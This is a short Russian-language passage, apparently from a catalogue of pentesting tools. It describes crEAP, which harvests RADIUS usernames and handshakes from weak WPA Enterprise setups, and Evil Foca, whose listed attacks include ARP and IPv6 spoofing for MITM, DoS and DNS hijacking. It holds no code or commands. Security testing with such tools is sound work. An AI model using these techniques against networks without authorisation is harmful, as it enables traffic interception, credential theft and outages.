crEAP — это Pyhton-скрипт, который идентифицирует использование WPA Enterprise Mode Encryption, и если используется небезопасный протокол, то crEAP будет собирать Radius имена пользователей и хендшейки.
=============================
Evil Foca — Network Attack Toolkit
URL: https://github.com/ElevenPaths/EvilFOCA/
На сегодняшний день Evil Foca — это инструмент для пентестеров и аудиторов безопасности, перед которыми стоит цель проверить безопасность данных в IPv4- и IPv6-сетях. Инструмент производит следующие атаки:
MITM в IPv4-сетях с помощью ARP Spoofing и DHCP ACK инъекций;
MITM в IPv6-сетях с помощью Neighbor Advertisement Spoofing, SLAAC attack, поддельного DHCPv6;
DoS (Denial of Service) в IPv4-сетях с помощью ARP Spoofing;
DoS (Denial of Service) в IPv6-сетях с помощью SLAAC DoS;
DNS Hijacking.